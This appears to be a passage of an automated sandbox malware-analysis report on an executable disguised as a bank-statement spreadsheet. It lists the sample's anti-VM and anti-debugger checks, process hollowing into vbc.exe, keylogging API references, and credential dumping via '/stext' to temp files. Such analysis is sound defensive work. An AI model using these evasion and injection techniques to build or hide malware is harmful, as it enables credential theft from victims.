                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00406576 push 004065C9h; ret 0_2_004065C1
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00406578 push 004065C9h; ret 0_2_004065C1
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042E6E8 push 0042E714h; ret 0_2_0042E70C
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0046A6F4 push 0046A720h; ret 0_2_0046A718
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004166FC push ecx; mov dword ptr [esp], edx0_2_004166FE
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004366B4 push ecx; mov dword ptr [esp], ecx0_2_004366B8
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004606BC push 004606E8h; ret 0_2_004606E0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00406748 push 00406774h; ret 0_2_0040676C
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042E73C push 0042E768h; ret 0_2_0042E760

                Hooking and other Techniques for Hiding and Protection:

                Changes the view of files in windows explorer (hidden files and folders)
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004548A0 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_004548A0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0043C024 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_0043C024
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00426384 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00426384
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0043AE98 IsIconic,GetCapture,0_2_0043AE98
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00454F94 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00454F94
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00455044 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00455044
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0043B740 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_0043B740
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00451994 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,0_2_00451994
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_004548A0 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_004548A0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0043C024 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,2_2_0043C024
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00426384 IsIconic,GetWindowPlacement,GetWindowRect,2_2_00426384
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0043AE98 IsIconic,GetCapture,2_2_0043AE98
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00454F94 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,2_2_00454F94
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00455044 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,2_2_00455044
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0043B740 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,2_2_0043B740
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00451994 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,2_2_00451994
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004405C4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004405C4
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

                Malware Analysis System Evasion:

                Contains functionality to detect sleep reduction / modifications
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: 0_2_00430110
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: 2_2_00430110
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe File opened / queried: C:\Windows\system32\drivers\VBoxMouse.sys
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe File opened / queried: C:\Windows\system32\drivers\vmmouse.sys
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe File opened / queried: C:\Windows\system32\drivers\VBoxGuest.sys
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe File opened / queried: C:\Windows\system32\drivers\vmhgfs.sys
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 7_2_00408836 memset, CreateFileW, NtQuerySystemInformation, NtQuerySystemInformation, FindCloseChangeNotification, GetCurrentProcessId, _wcsicmp, _wcsicmp, _wcsicmp, OpenProcess, GetCurrentProcess, DuplicateHandle, memset, NtQueryObject, CloseHandle, _wcsicmp, CloseHandle, FreeLibrary
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: 0_2_00453E74 GetCurrentThreadId, GetCursorPos, WaitForSingleObject
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: 2_2_00453E74 GetCurrentThreadId, GetCursorPos, WaitForSingleObject
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Thread delayed: delay time: 300000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Thread delayed: delay time: 180000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 300000Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 300000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 180000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 300000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 300000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_004301102_2_00430110
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0046A9D0 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 0046A9EBh0_2_0046A9D0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_0046A9D0 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 0046A9EBh2_2_0046A9D0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00408900 FindFirstFileA,GetLastError,0_2_00408900
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405AC0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00408900 FindFirstFileA,GetLastError,2_2_00408900
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_00405AC0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00406EC3
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,7_2_00408441
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,7_2_00407E0E
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004206A4 GetSystemInfo,0_2_004206A4
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.775356177.0000000006E40000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.806976267.0000000006810000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862199701.0000000006330000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.888847938.0000000006950000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: BANK-STATMENT _xlsx.exe, 00000022.00000002.912205260.000000000077B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV2
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.775356177.0000000006E40000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.806976267.0000000006810000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862199701.0000000006330000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.888847938.0000000006950000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.775356177.0000000006E40000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.806976267.0000000006810000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862199701.0000000006330000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.888847938.0000000006950000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: BANK-STATMENT _xlsx.exe, 0000000F.00000002.798729439.00000000008DA000.00000004.00000020.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.882848976.00000000007BD000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: BANK-STATMENT _xlsx.exe, 00000001.00000002.775356177.0000000006E40000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000000F.00000002.806976267.0000000006810000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 00000015.00000002.862199701.0000000006330000.00000002.00000001.sdmp, BANK-STATMENT _xlsx.exe, 0000001D.00000002.888847938.0000000006950000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process queried: DebugFlags
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process queried: DebugObjectHandle
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048B6F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048B6F3
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,7_2_00408836
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004405C4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004405C4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048F412 mov eax, dword ptr fs:[00000030h]1_2_0048F412
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048F4D0 mov eax, dword ptr fs:[00000030h]1_2_0048F4D0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048A746 SetUnhandledExceptionFilter,1_2_0048A746
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048BBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0048BBB5
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_0048DD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0048DD7F
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMemory protected: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion:

                .NET source code references suspicious native API functions
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Section loaded: unknown target: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe protection: execute and read and write
                Sample uses process hollowing technique
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2264
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process created: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2304
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2288
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
                Source: BANK-STATMENT _xlsx.exe, 00000027.00000002.929173429.0000000000C30000.00000002.00000001.sdmp Binary or memory string: Program Manager
                Source: BANK-STATMENT _xlsx.exe, 00000027.00000002.929173429.0000000000C30000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                Source: BANK-STATMENT _xlsx.exe, 00000027.00000002.929173429.0000000000C30000.00000002.00000001.sdmp Binary or memory string: Progman
                Source: BANK-STATMENT _xlsx.exe, 00000027.00000002.929173429.0000000000C30000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_00405C78
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: GetLocaleInfoA,GetACP, 0_2_0040AC84
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: GetLocaleInfoA, 0_2_00409954
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: GetLocaleInfoA, 0_2_00409908
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_00405D84
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: GetLocaleInfoA, 1_2_0048EA4A
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 2_2_00405C78
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: GetLocaleInfoA,GetACP, 2_2_0040AC84
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: GetLocaleInfoA, 2_2_00409954
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe Code function: GetLocaleInfoA, 2_2_00409908
